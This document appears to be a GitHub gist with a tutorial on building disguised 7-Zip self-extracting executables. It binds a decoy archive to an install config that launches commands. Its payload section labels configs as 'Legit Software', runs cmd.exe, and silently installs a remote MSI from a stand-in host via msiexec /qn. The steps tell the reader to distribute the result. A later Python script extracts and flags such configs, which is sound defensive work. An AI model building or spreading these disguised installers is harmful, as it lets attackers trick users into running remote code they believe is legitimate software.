@keyboardcrunch
Last active April 7, 2023 00:36
7-zip SFX Payload

Steps

  1. Download and install 7-Zip.
  2. Download and extract the 7-Zip extras.
  3. Create a payload build directory and copy the 7zS.sfx file from the extras into it.
  4. Right-click your decoy payload and add it to a 7z archive, then move the archive to a stand-alone payload build directory.
  5. Craft your payload and save it as config.txt (see Payloads below; the file must be in UTF-8 format) within this payload build directory.
  6. In cmd.exe, binary-combine the files: copy /b 7zS.sfx + config.txt + decoy.7z sfx_payload.exe
  7. Distribute and test your sfx mayhem carefully.

Payloads

Command Execution

;!@Install@!UTF-8!
Title="Legit Software v1.2.3"
BeginPrompt="Ready to calculate?"
ExecuteFile="cmd.exe"
ExecuteParameters="/c calc"
;!@InstallEnd@!

Remote MSI Execution

;!@Install@!UTF-8!
Title="Legit Software v1.2.3"
ExecuteFile="msiexec.exe"
ExecuteParameters="/i https://example.com/kbc/sketchy.msi /qn"
Progress=no
;!@InstallEnd@!

Notes

  • The 7z-compressed decoy payload cannot be password protected, but you could put a password-protected archive within it and use the ExecuteFile or RunProgram (with the Directory variable) parameters to then open the password-protected archive.
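
Because step 6 simply concatenates the SFX module, config.txt and the archive, the config block sits in plaintext inside the resulting executable and can be recovered without running it. The following triage sketch is an added example, not part of the original gist: the function names, the `LAUNCHERS` list and the sample bytes are assumptions constructed for illustration.

```python
import re

START, END = b";!@Install@!UTF-8!", b";!@InstallEnd@!"
# Assumption: illustrative, non-exhaustive set of launchers worth a second look.
LAUNCHERS = {"cmd.exe", "powershell.exe", "msiexec.exe", "wscript.exe",
             "cscript.exe", "mshta.exe", "rundll32.exe"}
KV = re.compile(r'^\s*(\w+)\s*=\s*"?(.*?)"?\s*$')
URL = re.compile(r'https?://[^\s"]+', re.I)


def extract_sfx_config(data: bytes):
    """Return the installer config as (key, value) pairs, or None if no block is present."""
    start = data.find(START)
    end = data.find(END, start + 1) if start != -1 else -1
    if end == -1:
        return None
    text = data[start + len(START):end].decode("utf-8", errors="replace")
    # Keys such as RunProgram can repeat, so keep an ordered list, not a dict.
    matches = (KV.match(line) for line in text.splitlines())
    return [(m.group(1), m.group(2)) for m in matches if m]


def triage(data: bytes):
    """Flag config entries that launch a system binary or reference a remote URL."""
    findings = []
    for key, value in extract_sfx_config(data) or []:
        if key in ("ExecuteFile", "RunProgram") and value.split():
            exe = re.split(r"[\\/]", value.split()[0].lower())[-1]
            if exe in LAUNCHERS:
                findings.append(f"{key} launches {exe}")
        for url in URL.findall(value):
            findings.append(f"{key} references {url}")
    return findings


def build_sample(config: str) -> bytes:
    """Constructed stand-in for stub + config + archive; not a real executable."""
    return b"MZ" + b"\x00" * 64 + config.encode("utf-8") + b"7z\xbc\xaf\x27\x1c" + b"\x00" * 16


# Constructed sample reusing the "Remote MSI Execution" config shown on this page.
SAMPLE = build_sample(
    ';!@Install@!UTF-8!\nTitle="Legit Software v1.2.3"\nExecuteFile="msiexec.exe"\n'
    'ExecuteParameters="/i https://example.com/kbc/sketchy.msi /qn"\nProgress=no\n'
    ';!@InstallEnd@!\n')

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

To use it on a real file, pass the file's bytes to `triage()`; an empty list means no install block was found or nothing in it matched the two checks.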

Resources
